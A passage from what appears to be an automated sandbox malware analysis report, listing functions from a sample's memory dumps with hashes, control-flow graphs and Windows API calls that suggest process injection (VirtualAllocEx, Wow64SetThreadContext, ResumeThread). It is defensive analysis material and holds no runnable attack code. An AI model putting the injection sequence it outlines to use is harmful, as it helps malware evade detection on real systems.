                                            • Snapshot File: hcaresult_13_2_7790000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 800c4876d540b451c88377e2bb3783d612202741e0d644ff5e953b88973bd2ce
                                            • Instruction ID: 3bb09414f17c6e8500d777f54041128f898c8b7942cc87f9e3b9d46e91b40281
                                            • Opcode Fuzzy Hash: 800c4876d540b451c88377e2bb3783d612202741e0d644ff5e953b88973bd2ce
                                            • Instruction Fuzzy Hash: 682128B18003499FDF10CFAAC844BEEBBF5FF48310F10842AE519A7240D7799540CBA4
                                            Function 0779C3C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 275 779c3c0-779c40b 277 779c41b-779c44b Wow64SetThreadContext 275->277 278 779c40d-779c419 275->278 280 779c44d-779c453 277->280 281 779c454-779c484 277->281 278->277 280->281
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0779C43E
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462201225.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7790000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 0905f589ba68bcd0b50dd408e1a21458c3cf36576ed54ff02e3d0bc91b940fd1
                                            • Instruction ID: 8202a983bb8365f0d1ab45dd74bd166ea2176b46e0d1f7020362a63d550f2325
                                            • Opcode Fuzzy Hash: 0905f589ba68bcd0b50dd408e1a21458c3cf36576ed54ff02e3d0bc91b940fd1
                                            • Instruction Fuzzy Hash: F92147B1D003098FDB10CFAAC4857EEBBF5EF48364F14842AD559A7240CB789984CFA5
                                            Function 031CB159 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 293 31cb159-31cb160 294 31cb102-31cb133 GetModuleHandleW 293->294 295 31cb162 293->295 300 31cb13c-31cb150 294->300 301 31cb135-31cb13b 294->301 296 31cb169-31cb17e call 31c98d8 295->296 297 31cb164-31cb167 295->297 303 31cb1ae-31cb1b3 296->303 304 31cb180-31cb191 call 31ca904 296->304 297->296 301->300 308 31cb1a5-31cb1ac call 31ca91c 304->308 309 31cb193-31cb19c call 31ca910 304->309 308->303 312 31cb1a1-31cb1a3 309->312 312->303
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,031CAEEC), ref: 031CB126
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: d4179c71a43fcd93bf457e5789db091c35bb0bb6759e13074b629ad185b006fd
                                            • Instruction ID: 2770451be091c046a2aba6a5b168d954b465af4d95ff69206abb54042a03bc3e
                                            • Opcode Fuzzy Hash: d4179c71a43fcd93bf457e5789db091c35bb0bb6759e13074b629ad185b006fd
                                            • Instruction Fuzzy Hash: C5110476A183848FEB10CF66E8027AAFBE5EFDC210F18C05ED009E7211C7749801CBA1
                                            Function 076B041C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 314 76b041c-76b31cc CreateIconFromResourceEx 316 76b31ce-76b31d4 314->316 317 76b31d5-76b31f2 314->317 316->317
                                            APIs
                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076B311A,?,?,?,?,?), ref: 076B31BF
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462075146.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_76b0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: 74f5e330f3503a901063aafe508ba43ddc63998126e37200f5b4da2bccbc5768
                                            • Instruction ID: 88dba81849dd6100c19114b96ff67222dba7a809a0f67a0d545f63b273c86067
                                            • Opcode Fuzzy Hash: 74f5e330f3503a901063aafe508ba43ddc63998126e37200f5b4da2bccbc5768
                                            • Instruction Fuzzy Hash: CB1129B290034D9FDB21CFAAC844BDEBFF8EB49320F14845AE915A7250C375A950CFA5
                                            Function 0779C498 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0779C506
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462201225.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7790000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: cf3aa8dcc08ac7d07ce5262a02baeb911523471732a36aa4f38fcb35341abbae
                                            • Instruction ID: 8f415096dc5085441b3977627ec3beed65a8821b4be289993629bae46ee1417a
                                            • Opcode Fuzzy Hash: cf3aa8dcc08ac7d07ce5262a02baeb911523471732a36aa4f38fcb35341abbae
                                            • Instruction Fuzzy Hash: E41126729003499FDF10DFAAC844BEFBBF5AF48320F248829E519A7250C775A540CFA4
                                            Function 031C98D8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,031CAEEC), ref: 031CB126
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: ba12348f3a628055f3797661fe635324718f02b5fed11a9b4c1695f8e207d9bb
                                            • Instruction ID: 82d077cb8d9c7eb101b6a6c3b62b6a74e795d5f083dfdef7fb9b5bc9c0c841a5
                                            • Opcode Fuzzy Hash: ba12348f3a628055f3797661fe635324718f02b5fed11a9b4c1695f8e207d9bb
                                            • Instruction Fuzzy Hash: C311F0B5D143498BCB20DF9AD845BDEFBF4EB48620F14842AD429B7200D375A545CFA5
                                            Function 0779C310 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462201225.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7790000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: ba0b01c26e5bfe2ff874e5c9524f85eb2fa0c1599a570f1788bfcd0d778863e2
                                            • Instruction ID: 764dc857be79d61e0f7ef1c66837a52c571a3bea8edd08f00ce5c68c06129981
                                            • Opcode Fuzzy Hash: ba0b01c26e5bfe2ff874e5c9524f85eb2fa0c1599a570f1788bfcd0d778863e2
                                            • Instruction Fuzzy Hash: EC1128B19003488BDB10DFAAC4457DFFBF4AB48224F148429D519A7240C7796540CFA5
                                            Function 0173D3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1449398946.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_173d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6283373f9e90318250b58e33caa040e9e031b8afb31b6e8d3f94dd5fe16e9956
                                            • Instruction ID: bed8c491472f12b8c64045c73ea5b0f6f53a6fd93a380ed9975d9a2af5a65bf2
                                            • Opcode Fuzzy Hash: 6283373f9e90318250b58e33caa040e9e031b8afb31b6e8d3f94dd5fe16e9956
                                            • Instruction Fuzzy Hash: 9021F1B1504204EFDB25DF94D9C0B66FBA5FBC8324F60C1A9ED090B257C336E456CAA2
                                            Function 0173D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1449398946.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_173d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfe39f9914162d5d1f0b1d67b6ab078b7a3bafd075c4799ed5ad1429d6d24fd0
                                            • Instruction ID: bc452beaa3d9a4f6401c79f6b28c63c9f46908be7be84e8a7cff08dc083c0220
                                            • Opcode Fuzzy Hash: bfe39f9914162d5d1f0b1d67b6ab078b7a3bafd075c4799ed5ad1429d6d24fd0
                                            • Instruction Fuzzy Hash: 6521F472504244DFDB25DF54D980B26FB65FBC4218F70C5A9E8050B297C336D456CAA2
                                            Function 0174D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451063930.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_174d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80bd745259293bf010ffb1ae15c6a36f58d2aaee731e3ac040d0a80bdce66f0e
                                            • Instruction ID: 53ed6236efd5c894bb441b1c56f186d6b82fefaff7d0d1151dfc5b95669fc6f2
                                            • Opcode Fuzzy Hash: 80bd745259293bf010ffb1ae15c6a36f58d2aaee731e3ac040d0a80bdce66f0e
                                            • Instruction Fuzzy Hash: 66212671608304EFDB25DF94D9C0B26FBA5FB98324F20C6ADE9894B352C336D446CA61
                                            Function 0174D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451063930.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_174d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd1d9d620cb33e283feed9e7ced0ec6ae2a1af40712159e5709f2119cb35486f
                                            • Instruction ID: 2849082dfd373a81c9ce3a9488b610c951762c5dee76f3472674d978fba68533
                                            • Opcode Fuzzy Hash: bd1d9d620cb33e283feed9e7ced0ec6ae2a1af40712159e5709f2119cb35486f
                                            • Instruction Fuzzy Hash: 7B213771604304DFDB25DF94D5C4B26FBA1FB94314F20C5ADE8890B262C336D447CA61
                                            Function 0173D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1449398946.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_173d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                            • Instruction ID: 629175a6c68276f4769cbe4b5784ce81384169f5fc94d041d8796a288fca2588
                                            • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                            • Instruction Fuzzy Hash: 53119D76504280CFDB26CF54D5C4B16BF62FB84218F2486A9D8490B657C336D556CBA1
                                            Function 0173D3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1449398946.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_173d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                            • Instruction ID: dc69f00ca219ea653632df63707f8dc75042304e08d68edd53ea17e5f77a704a
                                            • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                            • Instruction Fuzzy Hash: 0411CD72404240CFDB22CF54D5C4B56BF62FB84224F2482A9DC490A257C33AE456CBA1
                                            Function 0174D017 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451063930.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_174d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                            • Instruction ID: c49833b00b6a87db3a79fe3beb230d1872e169f0655dc19122d9474686a2b9f4
                                            • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                            • Instruction Fuzzy Hash: 3E11D075504280CFDB26CF54D5C4B15FFA2FB44314F24C6AED8494B666C33AD40ACB61
                                            Function 0174D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451063930.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_174d000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                            • Instruction ID: 37441d2c47c0af7e783e0797d956a9c78ca272f34576565c003c6374ba41fa0b
                                            • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                            • Instruction Fuzzy Hash: 52118B75508280DFDB26CF54D5C4B15FBA2FB84224F24C6AAE8894B696C33AD44ACB61
                                            Function 0C041CD1 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b97c4ff3b98829c8d69aa99885190f8dd780bc0e119605b1fcbdc0d1a2dd82ea
                                            • Instruction ID: 7c354bbd821c921b92f4dfdaecca500e0831450635f9854e504eb6b49f05a60f
                                            • Opcode Fuzzy Hash: b97c4ff3b98829c8d69aa99885190f8dd780bc0e119605b1fcbdc0d1a2dd82ea
                                            • Instruction Fuzzy Hash: C8F0A0713097909FC7168B29A8147977FF5AFCA311F2980AAE049CB262CB654808C751
                                            Function 0C040A48 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16c1228d73a0997b5b04f744d7755ce269e2490930acf546d68fa0a49a14fe71
                                            • Instruction ID: 7f9b3539f03cfaf41bdb49ae201881be133ea00d0eb510e7830de53233c82009
                                            • Opcode Fuzzy Hash: 16c1228d73a0997b5b04f744d7755ce269e2490930acf546d68fa0a49a14fe71
                                            • Instruction Fuzzy Hash: E1E07D37301F141BC2145225A4097A7B2EEDBC4732F98C03FB501D3340CF268C02C290
                                            Function 0C040823 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9f6b529a805cad1f674998ba934dabe5e45191ac1710be700b719862b4e464a
                                            • Instruction ID: a1366c4d3f7e939f518f6077b86264753b123238bd05953f2216a4d57ca6d876
                                            • Opcode Fuzzy Hash: b9f6b529a805cad1f674998ba934dabe5e45191ac1710be700b719862b4e464a
                                            • Instruction Fuzzy Hash: D8F0F8B0D4020ADFDB40EFA4C9567AEBFB1AB04305F204929D555E7281EBB50A41CBC1
                                            Function 0C041CE8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df084d1914b369afaf9fdb5cec7657ef1eb60ce98ad492e92186268fa4f67212
                                            • Instruction ID: 302b635a97b59953e24e6e97962829d5be100a040a437b1c431938e437f4673c
                                            • Opcode Fuzzy Hash: df084d1914b369afaf9fdb5cec7657ef1eb60ce98ad492e92186268fa4f67212
                                            • Instruction Fuzzy Hash: E5E04F753016246BCB599A2AE4049ABB7EAAFC8611725846EF00A8B220CF2198048790
                                            Function 0C040830 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08c52f3d7da2812fa14eefea3a1ed817a32375f4d1442174a74a65d2fc9bf563
                                            • Instruction ID: aacb229b3baab2a3d0f242388b8e53a781c6c05799d3e1207f056ec58dfe37f0
                                            • Opcode Fuzzy Hash: 08c52f3d7da2812fa14eefea3a1ed817a32375f4d1442174a74a65d2fc9bf563
                                            • Instruction Fuzzy Hash: B2E0C2B0D4020ADFDB40EFA8C9567AEBFF1AB48704F204829D615F7281EBB41641CBD1
                                            Function 0C040A58 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f272e77c0080593cb8c075b127febff5ec3602a50448a83890f3c768ade626a1
                                            • Instruction ID: 3d90898c76616efbfaa401cfba4e14ad979d1273f51c82f48528e12778f8fb0c
                                            • Opcode Fuzzy Hash: f272e77c0080593cb8c075b127febff5ec3602a50448a83890f3c768ade626a1
                                            • Instruction Fuzzy Hash: 48D05E3A3016105B8665266AA4086ABB7DA9FC8B32718C02FB546833018F629811C2A0
                                            Function 0C040888 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6185b304bf03394055ffb0c73509dd4b07fcb2c29a90c5f3b154849b64936af7
                                            • Instruction ID: ae64a5d731c30d84470b5ddcae2341d888b7bc9589bf4ceb9a9e9a109024c2cd
                                            • Opcode Fuzzy Hash: 6185b304bf03394055ffb0c73509dd4b07fcb2c29a90c5f3b154849b64936af7
                                            • Instruction Fuzzy Hash: 4AE09AA0C55319EEEB40EBB9850A79EBFF46B04204F908979C155E6241EBB842059FA1
                                            Function 0C040898 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fae934f098fec96625d25e09aec1dec8c3152d8d2c578409c1a7f8fe4eef8336
                                            • Instruction ID: 05ed5d70d467479d356193696954b9e9f0e5ade04e093543ba469000ef540d85
                                            • Opcode Fuzzy Hash: fae934f098fec96625d25e09aec1dec8c3152d8d2c578409c1a7f8fe4eef8336
                                            • Instruction Fuzzy Hash: EFD042B0C4530AAEDB50EFB9860979FBBF4AB04204F10497AC155FA241EBB442548FA1

                                            Execution Graph

                                            Execution Coverage:12.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:153
                                            Total number of Limit Nodes:12
                                            execution_graph 41899 f866f8 41900 f86760 CreateWindowExW 41899->41900 41902 f8681c 41900->41902 41902->41902 41903 e8d1f8 41904 e8d217 41903->41904 41905 e8d24b LdrInitializeThunk 41904->41905 41906 e8d268 41905->41906 42033 f819a8 42034 f819d7 42033->42034 42037 f81730 42034->42037 42036 f81afc 42038 f8173b 42037->42038 42039 f8201a 42038->42039 42042 f84b98 42038->42042 42053 f84b83 42038->42053 42039->42036 42043 f84bc3 42042->42043 42044 f836ac GetModuleHandleW 42043->42044 42045 f84c2a 42044->42045 42049 f836ac GetModuleHandleW 42045->42049 42064 f850d0 42045->42064 42069 f85150 42045->42069 42073 f85080 42045->42073 42046 f84c46 42047 f836bc GetModuleHandleW 42046->42047 42048 f84c72 42046->42048 42047->42048 42049->42046 42054 f84bc3 42053->42054 42055 f836ac GetModuleHandleW 42054->42055 42056 f84c2a 42055->42056 42060 f836ac GetModuleHandleW 42056->42060 42061 f850d0 GetModuleHandleW 42056->42061 42062 f85080 GetModuleHandleW 42056->42062 42063 f85150 GetModuleHandleW 42056->42063 42057 f84c46 42058 f836bc GetModuleHandleW 42057->42058 42059 f84c72 42057->42059 42058->42059 42060->42057 42061->42057 42062->42057 42063->42057 42065 f850eb 42064->42065 42066 f850ef 42064->42066 42065->42046 42067 f8522e 42066->42067 42068 f852e0 GetModuleHandleW 42066->42068 42068->42067 42070 f851ad 42069->42070 42071 f8522e 42070->42071 42072 f852e0 GetModuleHandleW 42070->42072 42072->42071 42074 f85095 42073->42074 42075 f850fa 42073->42075 42074->42046 42076 f8522e 42075->42076 42077 f852e0 GetModuleHandleW 42075->42077 42077->42076 42078 e8bd08 42079 e8bd27 LdrInitializeThunk 42078->42079 42081 e8bd5b 42079->42081 41907 b4d01c 41908 b4d034 41907->41908 41909 b4d08e 41908->41909 41918 f8477c 41908->41918 41922 f84765 41908->41922 41930 f84723 41908->41930 41938 f869d1 41908->41938 41941 f868a0 41908->41941 41947 f868b0 41908->41947 41953 f8b1e0 41908->41953 41961 f8478c 41908->41961 41919 f84787 41918->41919 41969 f847b4 41919->41969 41921 f869e7 41921->41909 41923 f84775 41922->41923 41924 f8b269 41923->41924 41926 f8b259 41923->41926 42001 f8a164 41924->42001 41993 f8b390 41926->41993 41997 f8b380 41926->41997 41927 f8b267 41932 f84701 41930->41932 41931 f8b269 41933 f8a164 CallWindowProcW 41931->41933 41932->41930 41932->41931 41934 f8b259 41932->41934 41935 f8b267 41933->41935 41936 f8b390 CallWindowProcW 41934->41936 41937 f8b380 CallWindowProcW 41934->41937 41936->41935 41937->41935 41939 f869e7 41938->41939 41940 f847b4 GetModuleHandleW 41938->41940 41939->41909 41940->41939 41942 f868d6 41941->41942 41943 f8477c GetModuleHandleW 41942->41943 41944 f868e2 41943->41944 41945 f8478c CallWindowProcW 41944->41945 41946 f868f7 41945->41946 41946->41909 41948 f868d6 41947->41948 41949 f8477c GetModuleHandleW 41948->41949 41950 f868e2 41949->41950 41951 f8478c CallWindowProcW 41950->41951 41952 f868f7 41951->41952 41952->41909 41956 f8b235 41953->41956 41954 f8b269 41955 f8a164 CallWindowProcW 41954->41955 41958 f8b267 41955->41958 41956->41954 41957 f8b259 41956->41957 41959 f8b390 CallWindowProcW 41957->41959 41960 f8b380 CallWindowProcW 41957->41960 41959->41958 41960->41958 41964 f84797 41961->41964 41962 f8b269 41963 f8a164 CallWindowProcW 41962->41963 41966 f8b267 41963->41966 41964->41962 41965 f8b259 41964->41965 41967 f8b390 CallWindowProcW 41965->41967 41968 f8b380 CallWindowProcW 41965->41968 41967->41966 41968->41966 41970 f847bf 41969->41970 41975 f836ac 41970->41975 41972 f86a49 41974 f86ab7 41972->41974 41979 f836bc 41972->41979 41976 f836b7 41975->41976 41977 f850eb 41976->41977 41983 f852e0 41976->41983 41977->41972 41980 f85650 GetModuleHandleW 41979->41980 41982 f856c5 41980->41982 41982->41974 41984 f85305 41983->41984 41985 f836bc GetModuleHandleW 41984->41985 41986 f8534a 41984->41986 41985->41986 41987 f836bc GetModuleHandleW 41986->41987 41992 f85516 41986->41992 41988 f8549b 41987->41988 41989 f836bc GetModuleHandleW 41988->41989 41988->41992 41990 f854e9 41989->41990 41991 f836bc GetModuleHandleW 41990->41991 41990->41992 41991->41992 41992->41977 41995 f8b39e 41993->41995 41994 f8a164 CallWindowProcW 41994->41995 41995->41994 41996 f8b487 41995->41996 41996->41927 41999 f8b39e 41997->41999 41998 f8a164 CallWindowProcW 41998->41999 41999->41998 42000 f8b487 41999->42000 42000->41927 42002 f8a16f 42001->42002 42003 f8b552 CallWindowProcW 42002->42003 42004 f8b501 42002->42004 42003->42004 42004->41927 42005 e86740 42009 e8675f 42005->42009 42006 e869c8 42008 e86170 RegQueryValueExW 42008->42009 42009->42006 42009->42008 42010 e86164 42009->42010 42011 e86a50 RegOpenKeyExW 42010->42011 42013 e86b16 42011->42013 42014 f8a3b0 42015 f8a3f6 GetCurrentProcess 42014->42015 42017 f8a448 GetCurrentThread 42015->42017 42018 f8a441 42015->42018 42019 f8a47e 42017->42019 42020 f8a485 GetCurrentProcess 42017->42020 42018->42017 42019->42020 42021 f8a4bb 42020->42021 42026 f8a5f0 42021->42026 42031 f8a580 42021->42031 42022 f8a4e3 GetCurrentThreadId 42023 f8a514 42022->42023 42027 f8a5f3 DuplicateHandle 42026->42027 42028 f8a595 42026->42028 42030 f8a68e 42027->42030 42028->42022 42030->42022 42032 f8a52d 42031->42032 42032->42022

                                            Executed Functions

                                            Function 00E3B6D0 Relevance: 3.2, Instructions: 3228COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3815818544.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e30000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac5b4e9bebbebfa601fcf33a1c9d7ab808657752dbcfbac5cd2e8df863fac479
                                            • Instruction ID: d9461d8a17f2a9d9578a69e3619c39fc34d2cf1201e8ba40cab02d9582d07c53
                                            • Opcode Fuzzy Hash: ac5b4e9bebbebfa601fcf33a1c9d7ab808657752dbcfbac5cd2e8df863fac479
                                            • Instruction Fuzzy Hash: 0D631C31D107198ECB11EF68C8446A9FBB1FF99300F55D69AE4597B261EB30AAC4CF81
                                            Function 00E301D0 Relevance: .9, Instructions: 903COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3815818544.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e30000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e3ed49afb250fd95f2ce5112cf6113071f4731b2a9590b0307d8c494850a125
                                            • Instruction ID: 8be405823246aaa0b83755c5c2f2611844de7fd0bad45190ed2fcf538df13d18
